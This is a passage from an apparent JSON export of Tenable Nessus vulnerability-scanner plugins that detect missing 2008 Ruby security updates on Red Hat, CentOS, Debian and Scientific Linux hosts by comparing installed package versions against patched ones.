cpu:\"x86_64\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-libs / ruby-mode / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:20:19", "bulletinFamily": "scanner", "description": "Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2008-0896.NASL", "href": "https://www.tenable.com/plugins/nessus/34465", "published": "2008-10-22T00:00:00", "title": "RHEL 3 : ruby (RHSA-2008:0896)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0896. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34465);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:13\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0896\");\n\n script_name(english:\"RHEL 3 : ruby (RHSA-2008:0896)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0896\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0896\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"irb-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-libs / ruby-mode / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:15:08", "bulletinFamily": "scanner", "description": "Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "CENTOS_RHSA-2008-0896.NASL", "href": "https://www.tenable.com/plugins/nessus/34462", "published": "2008-10-22T00:00:00", "title": "CentOS 3 : ruby (CESA-2008:0896)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0896 and \n# CentOS Errata and Security Advisory 2008:0896 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34462);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/10/25 13:36:04\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0896\");\n\n script_name(english:\"CentOS 3 : ruby (CESA-2008:0896)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015332.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b770fbcf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a367838f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015343.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9465e3d8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-libs / ruby-mode / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:21:02", "bulletinFamily": "scanner", "description": "The regular expression engine of Ruby, a scripting language, contains\na memory leak which can be triggered remotely under certain\ncircumstances, leading to a denial of service condition (CVE-2008-3443\n).\n\nIn addition, this security update addresses a regression in the REXML\nXML parser of the ruby1.8 package; the regression was introduced in\nDSA-1651-1.", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-1695.NASL", "href": "https://www.tenable.com/plugins/nessus/35294", "published": "2009-01-06T00:00:00", "title": "Debian DSA-1695-1 : ruby1.8, ruby1.9 - memory leak", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1695. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35294);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2008-3443\");\n script_bugtraq_id(30682);\n script_xref(name:\"DSA\", value:\"1695\");\n\n script_name(english:\"Debian DSA-1695-1 : ruby1.8, ruby1.9 - memory leak\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The regular expression engine of Ruby, a scripting language, contains\na memory leak which can be triggered remotely under certain\ncircumstances, leading to a denial of service condition (CVE-2008-3443\n).\n\nIn addition, this security update addresses a regression in the REXML\nXML parser of the ruby1.8 package; the regression was introduced in\nDSA-1651-1.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=494401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1695\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Ruby packages.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 1.8.5-4etch4 of the ruby1.8 package, and version\n1.9.0+20060609-1etch4 of the ruby1.9 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"irb1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"irb1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbm-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbm-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libgdbm-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libgdbm-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libopenssl-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libopenssl-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libreadline-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libreadline-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.8-dbg\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.9-dbg\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libtcltk-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libtcltk-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"rdoc1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"rdoc1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ri1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ri1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-dev\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-elisp\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-examples\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-dev\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-elisp\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-examples\", reference:\"1.9.0+20060609-1etch4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:12:47", "bulletinFamily": "scanner", "description": "The Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby", "modified": "2019-11-02T00:00:00", "id": "SL_20081021_RUBY_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60485", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : ruby on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60485);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:17\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n\n script_name(english:\"Scientific Linux Security Update : ruby on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0810&L=scientific-linux-errata&T=0&P=2062\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0d1a4fd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"irb-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", 